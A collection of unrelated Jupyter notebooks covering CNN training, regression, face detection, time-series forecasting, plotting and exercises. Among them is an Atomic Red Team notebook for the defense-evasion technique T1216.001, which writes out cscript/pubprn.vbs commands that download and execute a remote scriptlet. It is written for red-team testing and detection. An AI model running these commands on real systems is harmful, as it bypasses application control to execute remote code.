# We will use a conservative configuration for the stochastic gradient descent optimizer with a learning rate of 0.01 and a momentum of 0.9. The categorical cross-entropy loss function will be optimized, suitable for multi-class classification, and we will monitor the classification accuracy metric, which is appropriate given we have the same number of examples in each of the 10 classes.
#
# The define_model() function below will define and return this model.
# define cnn model
def define_model():
model = Sequential()
model.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', input_shape=(28, 28, 1)))
model.add(MaxPooling2D((2, 2)))
model.add(Flatten())
model.add(Dense(100, activation='relu', kernel_initializer='he_uniform'))
model.add(Dense(10, activation='softmax'))
# compile model
opt = SGD(lr=0.01, momentum=0.9)
model.compile(optimizer=opt, loss='categorical_crossentropy', metrics=['accuracy'])
return model
# # Evaluate Model
# After the model is defined, we need to evaluate it.
#
# The model will be evaluated using 5-fold cross-validation. The value of k=5 was chosen to provide a baseline for both repeated evaluation and to not be too large as to require a long running time. Each test set will be 20% of the training dataset, or about 12,000 examples, close to the size of the actual test set for this problem.
#
# The training dataset is shuffled prior to being split and the sample shuffling is performed each time so that any model we evaluate will have the same train and test datasets in each fold, providing an apples-to-apples comparison.
#
# We will train the baseline model for a modest 10 training epochs with a default batch size of 32 examples. The test set for each fold will be used to evaluate the model both during each epoch of the training run, so we can later create learning curves, and at the end of the run, so we can estimate the performance of the model. As such, we will keep track of the resulting history from each run, as well as the classification accuracy of the fold.
#
# The evaluate_model() function below implements these behaviors, taking the training dataset as arguments and returning a list of accuracy scores and training histories that can be later summarized.#
# evaluate a model using k-fold cross-validation
def evaluate_model(dataX, dataY, n_folds=5):
scores, histories = list(), list()
# prepare cross validation
kfold = KFold(n_folds, shuffle=True, random_state=1)
# enumerate splits
for train_ix, test_ix in kfold.split(dataX):
# define model
model = define_model()
# select rows for train and test
trainX, trainY, testX, testY = dataX[train_ix], dataY[train_ix], dataX[test_ix], dataY[test_ix]
# fit model
history = model.fit(trainX, trainY, epochs=10, batch_size=32, validation_data=(testX, testY), verbose=0)
# evaluate model
_, acc = model.evaluate(testX, testY, verbose=0)
print('> %.3f' % (acc * 100.0))
# append scores
scores.append(acc)
histories.append(history)
return scores, histories
# # Present Results
# Once the model has been evaluated, we can present the results.
#
# There are two key aspects to present: the diagnostics of the learning behavior of the model during training and the estimation of the model performance. These can be implemented using separate functions.
#
# First, the diagnostics involve creating a line plot showing model performance on the train and test set during each fold of the k-fold cross-validation. These plots are valuable for getting an idea of whether a model is overfitting, underfitting, or has a good fit for the dataset.
#
# We will create a single figure with two subplots, one for loss and one for accuracy. Blue lines will indicate model performance on the training dataset and orange lines will indicate performance on the hold out test dataset. The summarize_diagnostics() function below creates and shows this plot given the collected training histories.
# plot diagnostic learning curves
def summarize_diagnostics(histories):
for i in range(len(histories)):
# plot loss
pyplot.subplot(211)
pyplot.title('Cross Entropy Loss')
pyplot.plot(histories[i].history['loss'], color='blue', label='train')
pyplot.plot(histories[i].history['val_loss'], color='orange', label='test')
# plot accuracy
pyplot.subplot(212)
pyplot.title('Classification Accuracy')
pyplot.plot(histories[i].history['accuracy'], color='blue', label='train')
pyplot.plot(histories[i].history['val_accuracy'], color='orange', label='test')
pyplot.show()
# Next, the classification accuracy scores collected during each fold can be summarized by calculating the mean and standard deviation. This provides an estimate of the average expected performance of the model trained on this dataset, with an estimate of the average variance in the mean. We will also summarize the distribution of scores by creating and showing a box and whisker plot.
#
# The summarize_performance() function below implements this for a given list of scores collected during model evaluation.
# summarize model performance
def summarize_performance(scores):
# print summary
print('Accuracy: mean=%.3f std=%.3f, n=%d' % (mean(scores)*100, std(scores)*100, len(scores)))
# box and whisker plots of results
pyplot.boxplot(scores)
pyplot.show()
# run the test harness for evaluating a model
def run_test_harness():
# load dataset
trainX, trainY, testX, testY = load_dataset()
# prepare pixel data
trainX, testX = prep_pixels(trainX, testX)
# evaluate model
scores, histories = evaluate_model(trainX, trainY)
# learning curves
summarize_diagnostics(histories)
# summarize estimated performance
summarize_performance(scores)
# # Complete Example
# +
# baseline cnn model for fashion mnist
from numpy import mean
from numpy import std
from matplotlib import pyplot
from sklearn.model_selection import KFold
from keras.datasets import fashion_mnist
from keras.utils import to_categorical
from keras.models import Sequential
from keras.layers import Conv2D
from keras.layers import MaxPooling2D
from keras.layers import Dense
from keras.layers import Flatten
from keras.optimizers import SGD
# load train and test dataset
def load_dataset():
# load dataset
(trainX, trainY), (testX, testY) = fashion_mnist.load_data()
# reshape dataset to have a single channel
trainX = trainX.reshape((trainX.shape[0], 28, 28, 1))
testX = testX.reshape((testX.shape[0], 28, 28, 1))
# one hot encode target values
trainY = to_categorical(trainY)
testY = to_categorical(testY)
return trainX, trainY, testX, testY
# scale pixels
def prep_pixels(train, test):
# convert from integers to floats
train_norm = train.astype('float32')
test_norm = test.astype('float32')
# normalize to range 0-1
train_norm = train_norm / 255.0
test_norm = test_norm / 255.0
# return normalized images
return train_norm, test_norm
# define cnn model
def define_model():
model = Sequential()
model.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', input_shape=(28, 28, 1)))
model.add(MaxPooling2D((2, 2)))
model.add(Flatten())
model.add(Dense(100, activation='relu', kernel_initializer='he_uniform'))
model.add(Dense(10, activation='softmax'))
# compile model
opt = SGD(lr=0.01, momentum=0.9)
model.compile(optimizer=opt, loss='categorical_crossentropy', metrics=['accuracy'])
return model
# evaluate a model using k-fold cross-validation
def evaluate_model(dataX, dataY, n_folds=5):
scores, histories = list(), list()
# prepare cross validation
kfold = KFold(n_folds, shuffle=True, random_state=1)
# enumerate splits
for train_ix, test_ix in kfold.split(dataX):
# define model
model = define_model()
# select rows for train and test
trainX, trainY, testX, testY = dataX[train_ix], dataY[train_ix], dataX[test_ix], dataY[test_ix]
# fit model
history = model.fit(trainX, trainY, epochs=10, batch_size=32, validation_data=(testX, testY), verbose=0)
# evaluate model
_, acc = model.evaluate(testX, testY, verbose=0)
print('> %.3f' % (acc * 100.0))
# append scores
scores.append(acc)
histories.append(history)
return scores, histories
# plot diagnostic learning curves
def summarize_diagnostics(histories):
for i in range(len(histories)):
# plot loss
pyplot.subplot(211)
pyplot.title('Cross Entropy Loss')
pyplot.plot(histories[i].history['loss'], color='blue', label='train')
pyplot.plot(histories[i].history['val_loss'], color='orange', label='test')
# plot accuracy
pyplot.subplot(212)
pyplot.title('Classification Accuracy')
pyplot.plot(histories[i].history['acc'], color='blue', label='train')
pyplot.plot(histories[i].history['val_acc'], color='orange', label='test')
pyplot.show()
# summarize model performance
def summarize_performance(scores):
# print summary
print('Accuracy: mean=%.3f std=%.3f, n=%d' % (mean(scores)*100, std(scores)*100, len(scores)))
# box and whisker plots of results
pyplot.boxplot(scores)
pyplot.show()
# run the test harness for evaluating a model
def run_test_harness():
# load dataset
trainX, trainY, testX, testY = load_dataset()
# prepare pixel data
trainX, testX = prep_pixels(trainX, testX)
# evaluate model
scores, histories = evaluate_model(trainX, trainY)
# learning curves
summarize_diagnostics(histories)
# summarize estimated performance
summarize_performance(scores)
# entry point, run the test harness
run_test_harness()
# -
# Running the example prints the classification accuracy for each fold of the cross-validation process. This is helpful to get an idea that the model evaluation is progressing.
#
# We can see that for each fold, the baseline model achieved an error rate below 10%, and in two cases 98% and 99% accuracy. These are good results.
#
# Note: your specific results may vary given the stochastic nature of the learning algorithm
# Next, a diagnostic plot is shown, giving insight into the learning behavior of the model across each fold.
#
# In this case, we can see that the model generally achieves a good fit, with train and test learning curves converging. There may be some signs of slight overfitting.
# Next, the summary of the model performance is calculated. We can see in this case, the model has an estimated skill of about 96%, which is impressive.
# Finally, a box and whisker plot is created to summarize the distribution of accuracy scores.
# All credit for this tutorial goes to <NAME>, PhD. I have merely followed his tutorial for my own learning purpose. You can check out his blog post on his website called "Machine Learning Mastery"
|
Clothing_Classifier.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .ps1
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: .NET (PowerShell)
# language: PowerShell
# name: .net-powershell
# ---
# # T1216.001 - Signed Script Proxy Execution: Pubprn
# Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application control solutions that do not account for use of these scripts.
#
# <code>PubPrn.vbs</code> is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is <code>cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png</code>.
# ## Atomic Tests
#Import the Module before running the tests.
# Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts.
Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force
# ### Atomic Test #1 - PubPrn.vbs Signed Script Bypass
# Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload.
#
# **Supported Platforms:** windows
# #### Attack Commands: Run with `command_prompt`
# ```command_prompt
# cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216.001/src/T1216.001.sct"
# ```
Invoke-AtomicTest T1216.001 -TestNumbers 1
# ## Detection
# Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.
|
playbook/tactics/defense-evasion/T1216.001.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Libraries
#here i import tha libraries
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
from sklearn.datasets import load_boston
from sklearn import metrics
# ## (Part 1) load the data and some basic analysis
#here i set the backend of the "matplotlib" to lineal
# %matplotlib inline
#here i crete a new datafreme using the "predict_house_price" data
df = pd.read_csv("data/predict_house_price.csv")
#here i view the data
df.head()
#here i used the function "info" for see the information of my dataframe(df)
df.info
#here i used the function "describe" for see the basic description of my dataframe(df)
df.describe()
#here i view the columns that have my dataframe
df.columns
#here i used the library "sns" for create a correlation plot with the columns of my dataframe (df)
sns.pairplot(df)
#here i used the "sns" library for create a histogram of the "selling_price" column, and make an estimate of the future(the future of this data) using this data(the mean of these data)
sns.distplot(df["selling_price"])
#here i crete a heatmap used the "sns" library, and set the "annot" option in "True"
sns.heatmap(df.corr(), annot = True)
#here i view the columns of my dataframe(df)
df.columns
#here i crete a "X" variable, this varible have all columns of my dataframe(df), lees except the column, "Adress" and "selling_price"
X = df[['mean_of_area_income', 'mean_of_area_house_age',
'mean_area_number_of_rooms', 'mean_area_number_of_bedrooms',
'population']]
#here I make my "X" variable be equal to the dataframe "df", but with the columns "Adress" and "selling_price" removed
X = df.drop(["Adress", "selling_price"], axis = 1)
#here i crete a "y" variable with the "selling_price" column fo my dataframe(df)
y = df["selling_price"]
#here i create 4 variables("X_train", "X_test", "y_train", "y_test") this variables are the train data("X_train","y_train"") and the test data("X_test","y_test"")
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.40, random_state=101)
#here i create a "lm" varible,this varible is the "LinearRegression" library
lm = LinearRegression()
#here i used the "fit" function(of the "LinearRegression" library), and I give the data(X_train, y_train)
# i train the algorithm with this data
lm.fit(X_train, y_train)
#here i print the results using the "intercept" function
#this is the value at which the fitted line crosses the y-axis.
print(lm.intercept_)
#here i using the "coef_" function of my "LinearRegression" library
#this shows estimated coefficients for the linear regression problem
lm.coef_
#here i view the columns of my X_train variable/dataframe
X_train.columns
#here i crete a new dataframe with the coefficients of each column(using by dataframe "lm.coef_")
cdf = pd.DataFrame(lm.coef_, X.columns, columns = ["Coeff"])
cdf
#here y create a new varible "boston" using the library load_boston()
boston = load_boston()
#here i view the "keys" of this library, using the function "keys()"
boston.keys()
#for example i view information of the "DESCR"
print(boston["DESCR"])
#for example i view information of the "data"
print(boston["data"])
#for example i view information of the "target"
print(boston["target"])
# ## (Part 2) Predictions
#here I assign the "Predictions" variable the "predict" function from the lm (LinearRegression) library using the data from the "X_test" variable
Predictions = lm.predict(X_test)
#here the algorithm makes the first predictions using the data of the variable "X_test"
Predictions
#here I can see the true values (executed the variable "y_test")
y_test
#here I create a linear regression graph with the predictions and the true values (as points
plt.scatter(y_test, Predictions)
#here i crete a histogram with the difference between predictions and True values, using the function "distplot" of the library sns(seaborn)
sns.distplot((y_test-Predictions))
#here we can see that the predictions are close to reality
#Here I do the same as the previous graph, only I use a more updated function (and with more support)
sns.histplot(y_test-Predictions,kde=True, stat="density", linewidth=0)
#here you see the mean absolute error of my predictions compared to the test data
#for make this i used the "mean_absolute_error" function of the "metrics" library. And pass as data the true vales(y_test) and the predictions(Predictions)
metrics.mean_absolute_error(y_test, Predictions)
#here you see the mean squared error of my predictions compared to the test data
#for make this i used the "mean_squared_error" function of the "metrics" library. And pass as data the true vales(y_test) and the predictions(Predictions)
metrics.mean_squared_error(y_test, Predictions)
#here you see the root mean square error of my predictions compared to the test data
#for make this i used the "sqrt" function of the "np" library. and pass as data the the mean squared error
np.sqrt(metrics.mean_squared_error(y_test, Predictions))
|
LINEAR_REGRESSION/IA_Python.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # HOG face detector using dlib
#
# Code is modified to run in jupyter notebook.
# Source from ageitgey:
# https://gist.github.com/ageitgey/1c1cb1c60ace321868f7410d48c228e1
# Tutorial article:
# https://medium.com/@ageitgey/machine-learning-is-fun-part-4-modern-face-recognition-with-deep-learning-c3cffc121d78#8b7d
import sys
import dlib
from skimage import io
# Take the image file name
file_name = "data/sample.jpg"
# +
# Create a HOG face detector using the built-in dlib class
face_detector = dlib.get_frontal_face_detector()
win = dlib.image_window()
# -
# Load the image into an array
image = io.imread(file_name)
# +
# Run the HOG face detector on the image data.
# The result will be the bounding boxes of the faces in our image.
detected_faces = face_detector(image, 1)
print("I found {} faces in the file {}".format(len(detected_faces), file_name))
# -
# Open a window on the desktop showing the image
win.set_image(image)
# Loop through each face we found in the image
for i, face_rect in enumerate(detected_faces):
# Detected faces are returned as an object with the coordinates
# of the top, left, right and bottom edges
print("- Face #{} found at Left: {} Top: {} Right: {} Bottom: {}".format(i, face_rect.left(), face_rect.top(), face_rect.right(), face_rect.bottom()))
# Draw a box around each face we found
win.add_overlay(face_rect)
|
_templates/dlib_HOGfacedetector.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3.6
# language: python
# name: python36
# ---
# 
# # Custom Python Transforms
#
# There will be scenarios when the easiest thing for you to do is just to write some Python code. This SDK provides three extension points that you can use.
#
# 1. New Script Column
# 2. New Script Filter
# 3. Transform Partition
#
# Each of these are supported in both the scale-up and the scale-out runtime. A key advantage of using these extension points is that you don't need to pull all of the data in order to create a dataframe. Your custom python code will be run just like other transforms, at scale, by partition, and typically in parallel.
# ## Initial data prep
# We start by loading crime data.
# +
import azureml.dataprep as dprep
col = dprep.col
dflow = dprep.read_csv(path='../data/crime-spring.csv')
dflow.head(5)
# -
# We trim the dataset down and keep only the columns we are interested in.
dflow = dflow.keep_columns(['Case Number','Primary Type', 'Description', 'Latitude', 'Longitude'])
dflow = dflow.replace_na(columns=['Latitude', 'Longitude'], custom_na_list='')
dflow.head(5)
# We look for null values using a filter. We found some, so now we'll look at a way to fill these missing values.
dflow.filter(col('Latitude').is_null()).head(5)
# ## Transform Partition
# We want to replace all null values with a 0, so we decide to use a handy pandas function. This code will be run by partition, not on all of the dataset at a time. This means that on a large dataset, this code may run in parallel as the runtime processes the data partition by partition.
# +
pt_dflow = dflow
def transform(df, index):
df['Latitude'].fillna('0',inplace=True)
df['Longitude'].fillna('0',inplace=True)
return df
dflow = pt_dflow.map_partition(fn=transform)
dflow.head(5)
# -
# ### Transform Partition With File
# Being able to use any python code to manipulate your data as a pandas DataFrame is extremely useful for complex and specific data operations that DataPrep doesn't handle natively. Though the code isn't very testable unfortunately, it's just sitting inside a string.
# So to improve code testability and ease of script writing there is another transform_partiton interface that takes the path to a python script which must contain a function matching the 'transform' signature defined above.
#
# The `script_path` argument should be a relative path to ensure Dataflow portability. Here `map_func.py` contains the same code as in the previous example.
dflow = pt_dflow.transform_partition_with_file('../data/map_func.py')
dflow.head(5)
# ## New Script Column
# We want to create a new column that has both the latitude and longitude. We can achieve it easily using [Data Prep expression](./add-column-using-expression.ipynb), which is faster in execution. Alternatively, We can do this using Python code by using the `new_script_column()` method on the dataflow. Note that we use custom Python code here for demo purpose only. In practise, you should always use Data Prep native functions as a preferred method, and use custom Python code when the functionality is not available in Data Prep.
dflow = dflow.new_script_column(new_column_name='coordinates', insert_after='Longitude', script="""
def newvalue(row):
return '(' + row['Latitude'] + ', ' + row['Longitude'] + ')'
""")
dflow.head(5)
# ## New Script Filter
# Now we want to filter the dataset down to only the crimes that incurred over $300 in loss. We can build a Python expression that returns True if we want to keep the row, and False to drop the row.
dflow = dflow.new_script_filter("""
def includerow(row):
val = row['Description']
return 'OVER $ 300' in val
""")
dflow.head(5)
|
how-to-use-azureml/work-with-data/dataprep/how-to-guides/custom-python-transforms.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
#%%
from vnpy.app.cta_strategy.backtesting import BacktestingEngine, OptimizationSetting
from vnpy.app.cta_strategy.strategies.atr_rsi_strategy import (
AtrRsiStrategy,
)
from datetime import datetime
#%%
engine = BacktestingEngine()
engine.set_parameters(
vt_symbol="IF88.CFFEX",
interval="1m",
start=datetime(2019, 1, 1),
end=datetime(2019, 4, 30),
rate=0.3/10000,
slippage=0.2,
size=300,
pricetick=0.2,
capital=1_000_000,
)
engine.add_strategy(AtrRsiStrategy, {})
#%%
engine.load_data()
engine.run_backtesting()
df = engine.calculate_result()
engine.calculate_statistics()
engine.show_chart()
# +
setting = OptimizationSetting()
setting.set_target("sharpe_ratio")
setting.add_parameter("atr_length", 3, 39, 1)
setting.add_parameter("atr_ma_length", 10, 30, 1)
engine.run_ga_optimization(setting)
|
examples/cta_backtesting/backtesting_demo.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %matplotlib inline
import matplotlib.pyplot as plt
import datetime as dt
import numpy as np
from numpy import log
import pandas as pd
import os
from statsmodels.tsa.stattools import adfuller
from statsmodels.graphics.tsaplots import plot_acf, plot_pacf
from statsmodels.tsa.arima_model import ARIMA
from statsmodels.tsa.stattools import acf
# +
#12
# +
from statsmodels.tsa.arima_model import ARIMA
import pmdarima as pm
df = pd.read_csv('2010_zip_4_monthly_data.csv', names=['value'], header=0)
model = pm.auto_arima(df.value, start_p=1, start_q=1,
test='adf', # use adftest to find optimal 'd'
max_p=3, max_q=3, # maximum p and q
m=1, # frequency of series
d=None, # let model determine 'd'
seasonal=False, # No Seasonality
start_P=0,
D=0,
trace=True,
error_action='ignore',
suppress_warnings=True,
stepwise=True)
print(model.summary())
# +
# 13
# -
model.plot_diagnostics(figsize=(7,5))
plt.show()
# +
# Forecast
n_periods = 24
fc, confint = model.predict(n_periods=n_periods, return_conf_int=True)
index_of_fc = np.arange(len(df.value), len(df.value)+n_periods)
# make series for plotting purpose
fc_series = pd.Series(fc, index=index_of_fc)
lower_series = pd.Series(confint[:, 0], index=index_of_fc)
upper_series = pd.Series(confint[:, 1], index=index_of_fc)
# Plot
plt.plot(df.value)
plt.plot(fc_series, color='darkgreen')
plt.fill_between(lower_series.index,
lower_series,
upper_series,
color='k', alpha=.15)
plt.title("Houston New Franchise Grown Forecast Area4 ")
plt.show()
# -
confint
# +
#14
# +
# Import
data = pd.read_csv('2010_zip_4_monthly_data.csv', parse_dates=['date'], index_col='date')
# Plot
fig, axes = plt.subplots(2, 1, figsize=(10,5), dpi=100, sharex=True)
# Usual Differencing
axes[0].plot(data[:], label='Original Series')
axes[0].plot(data[:].diff(1), label='Usual Differencing')
axes[0].set_title('Usual Differencing')
axes[0].legend(loc='upper left', fontsize=10)
# Seasinal Dei
axes[1].plot(data[:], label='Original Series')
axes[1].plot(data[:].diff(12), label='Seasonal Differencing', color='green')
axes[1].set_title('Seasonal Differencing')
plt.legend(loc='upper left', fontsize=10)
plt.suptitle('Number of Companies at Area 4', fontsize=16)
plt.show()
# +
# # !pip3 install pyramid-arima
import pmdarima as pm
# Seasonal - fit stepwise auto-ARIMA
smodel = pm.auto_arima(data, start_p=1, start_q=1,
test='adf',
max_p=3, max_q=3, m=12,
start_P=0, seasonal=True,
d=None, D=1, trace=True,
error_action='ignore',
suppress_warnings=True,
stepwise=True)
smodel.summary()
# -
smodel.plot_diagnostics(figsize=(7,5))
plt.show()
# +
# Forecast
n_periods = 24
fitted, confint = smodel.predict(n_periods=n_periods, return_conf_int=True)
index_of_fc = pd.date_range(data.index[-1], periods = n_periods, freq='MS')
# make series for plotting purpose
fitted_series = pd.Series(fitted, index=index_of_fc)
lower_series = pd.Series(confint[:, 0], index=index_of_fc)
upper_series = pd.Series(confint[:, 1], index=index_of_fc)
# Plot
plt.plot(data)
plt.plot(fitted_series, color='darkgreen')
plt.fill_between(lower_series.index,
lower_series,
upper_series,
color='k', alpha=.15)
plt.title("SARIMA - Final Forecast for Number of New Franchise at Area 4")
plt.show()
# -
confint
# +
#15
# -
# Import Data
data = pd.read_csv('2010_zip_4_monthly_data.csv', parse_dates=['date'], index_col='date')
# +
# Compute Seasonal Index
from statsmodels.tsa.seasonal import seasonal_decompose
from dateutil.parser import parse
# multiplicative seasonal component
result_mul = seasonal_decompose(data['value'][-36:], # 3 years
model='multiplicative',
extrapolate_trend='freq')
seasonal_index = result_mul.seasonal[-12:].to_frame()
seasonal_index['month'] = pd.to_datetime(seasonal_index.index).month
# merge with the base data
data['month'] = data.index.month
df = pd.merge(data, seasonal_index, how='left', on='month')
df.columns = ['value', 'month', 'seasonal_index']
df.index = data.index # reassign the index.
# +
import pmdarima as pm
# SARIMAX Model
sxmodel = pm.auto_arima(df[['value']], exogenous=df[['seasonal_index']],
start_p=1, start_q=1,
test='adf',
max_p=3, max_q=3, m=12,
start_P=0, seasonal=True,
d=None, D=1, trace=True,
error_action='ignore',
suppress_warnings=True,
stepwise=True)
sxmodel.summary()
# -
|
arima_ml_models/models/auto_model/Model_zip4.ipynb
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .jl
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Julia 0.4.2
# language: julia
# name: julia-0.4
# ---
# # Interactive Plots and Diagrams
using Reactive, Interact
# Interactive plotting can be useful and fun. Here we have a few examples to get you started creating your own interactive plots. We will extensively use the `@manipulate` macro from the [introductory notebook](Introduction.ipynb).
# ## Compose
# [Compose](http://composejl.org) is an excellent tool for creating declarative vector graphics. Here is an example compose diagram you can play around with.
# +
using Colors
using Compose
@manipulate for color=["yellow", "cyan", "tomato"], rotate=0:.05:2π, n=3:20
compose(context(), fill(parse(Colorant, color)),
polygon([((1+sin(θ+rotate))/2, (1+cos(θ+rotate))/2) for θ in 0:2π/n:2π]))
end
# -
# ## Gadfly
using Gadfly
@manipulate for ϕ = 0:π/16:4π, f = [sin, cos], both = false
if both
plot([θ -> sin(θ + ϕ), θ -> cos(θ + ϕ)], 0, 8)
else
plot(θ -> f(θ + ϕ), 0, 8)
end
end
@manipulate for n=1:25, g=[Geom.point, Geom.line]
Gadfly.plot(y=rand(n), x=rand(n), g)
end
# ## PyPlot
using PyPlot
# Since PyPlot API has functions with side effects, you want to create a figure first and use it in each iteration of `@manipulate` with `withfig`. Notice `f = figure()` and `withfig(f)` in the example below. The rest of it is straightforward.
f = figure()
x = linspace(0,2π,1000)
@manipulate for α=1:0.1:3, β=1:0.1:3, γ=1:0.1:3, leg="a funny plot"; withfig(f) do
PyPlot.plot(x, cos(α*x + sin(β*x + γ)))
legend([leg])
end
end
# As an added bonus, you can even fire up a Python GUI with `pygui(true)` and be able to use the widgets above to update the plot.
|
doc/notebooks/03-Interactive Diagrams and Plots.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Example Notebook to showcasing how we interact with JTReaders
# First change dir to JTR parent
import os
os.chdir('..')
# ### Bookkeeping of all existing readers: `readers.py`
# +
import jack.readers as readers
print("Existing models:\n{}".format(", ".join(readers.readers.keys())))
# -
# ### Load test data
# +
# Loaded some test data to work on
# This loads train, dev, and test data of sizes (2k, 1k, 1k)
import os
from jack.io.load import load_jack
class TestDatasets:
@staticmethod
def generate():
snli_path, snli_data = 'tests/test_data/SNLI/', []
splits = ['train.json', 'dev.json', 'test.json']
for split in splits:
path = os.path.join(snli_path, split)
snli_data.append(load_jack(path))
return snli_data
train_set, dev_set, test_set = TestDatasets.generate()
# -
# ### Create a reader
# +
from jack.core import SharedResources
from jack.util.vocab import Vocab
# Create example reader with a basic config
embedding_dim = 128
hidden_dim = 128
config = {"batch_size": 128, "repr_dim": hidden_dim, "repr_dim_input": embedding_dim, 'dropout' : 0.1}
svac = SharedResources(Vocab(), config)
reader = readers.readers["dam_snli_reader"](svac)
# -
# ### Add hooks
# +
# We create hooks which keep track of the metrics such as the loss
# We also create a classification metric monitoring hook for our model
from jack.util.hooks import LossHook
hooks = [LossHook(reader, iter_interval=10),
readers.eval_hooks['dam_snli_reader'](reader, dev_set, iter_interval=25, batch_size=32)]
# -
# ### Initialise optimiser
# +
# Here we initialise our optimiser
# we choose Adam with standard momentum values and learning rate 0.001
import tensorflow as tf
learning_rate = 0.001
optimizer = tf.train.AdamOptimizer(learning_rate)
# -
# ### Train reader
# Lets train the reader on the CPU for 2 epochs
reader.train(optimizer, train_set, hooks=hooks, max_epochs=2, batch_size=32)
# ### Plotting the results
# This plots the loss
hooks[0].plot()
# This plots the F1 (macro) score and accuracy between 0 and 1
hooks[1].plot(ylim=[0.0, 1.0])
|
notebooks/SNLI.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
#Replace the whole program in hacker rank with the code below
#Or submit this code as a file for testing the program (after converting it into .py extension of course)
x1,v1,x2,v2 = map(int, input().rstrip().split())
def meet_calc(mx,mn,add1,add2):
while(1):
#print(mx,mn)
if(add1<add2):
if(mx==mn):
return "YES"
if(mx<mn):
return "NO"
if(add1>add2 or add1==add2 and mx>mn):
return "NO"
mx+=add1
mn+=add2
def kangaroo(x1,v1,x2,v2):
if(x1>x2):
return meet_calc(x1,x2,v1,v2)
elif(x2>x1):
return meet_calc(x2,x1,v2,v1)
elif (x1==x2):
return "YES"
print(kangaroo(x1,v1,x2,v2))
# -
|
Kangaroo.ipynb
|
# +
"""
Rainbows & Wobniars
"""
# Write a function called "wobniar", which should contain the local variable "rainbow" below. The function should collect every other color of the rainbow starting at index 0 and add each one to a new list. When you add each color, it should be spelled backwards. For example, the word 'sing' would be added to the new list as 'gnis'. Return and print the list.
def wobniar():
rainbow = ['red','orange','yellow','green','blue','indigo','violet']
length = len(rainbow)
backwards = []
i = 0
while i in range(0,length+1):
if i % 2 == 0:
x = ''.join(reversed(rainbow[i]))
backwards.append(x)
i += 1
else:
i += 1
return backwards
a = wobniar()
print(a) # ['der', 'wolley', 'eulb', 'teloiv']
|
pset_functions/data_manipulation/solutions/nb/p4.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Tutorial 4: Muti-population recurrent network (with BioNet)
#
# Here we will create a heterogenous yet relatively small network consisting of hundreds of cells recurrently connected. All cells will belong to one of four "cell-types". Two of these cell types will be biophysically detailed cells, i.e. containing a full morphology and somatic and dendritic channels and receptors. The other two will be point-neuron models, which lack a full morphology or channels but still act to provide inhibitory and excitory dynamics.
#
# As input to drive the simulation, we will also create an external network of "virtual cells" that synapse directly onto our internal cells and provide spike trains stimulus
#
# **Note** - scripts and files for running this tutorial can be found in the directory [sources/chapter04/](https://github.com/AllenInstitute/bmtk/tree/develop/docs/tutorial/sources/chapter04)
#
# requirements:
# * bmtk
# * NEURON 7.4+
# ## 1. Building the network
#
# #### cells
#
# This network will loosely resemble the mouse V1 cortical column. Along the center of the column will be a population of 50 biophysically detailed neurons: 40 excitatory Scnn1a cells and 10 inhibitory PV cells.
# +
import numpy as np
from bmtk.builder.networks import NetworkBuilder
from bmtk.builder.auxi.node_params import positions_columinar, xiter_random
net = NetworkBuilder("V1")
net.add_nodes(
N=80, pop_name='Scnn1a',
positions=positions_columinar(N=80, center=[0, 50.0, 0], max_radius=30.0, height=100.0),
rotation_angle_yaxis=xiter_random(N=80, min_x=0.0, max_x=2*np.pi),
rotation_angle_zaxis=xiter_random(N=80, min_x=0.0, max_x=2*np.pi),
tuning_angle=np.linspace(start=0.0, stop=360.0, num=80, endpoint=False),
location='VisL4',
ei='e',
model_type='biophysical',
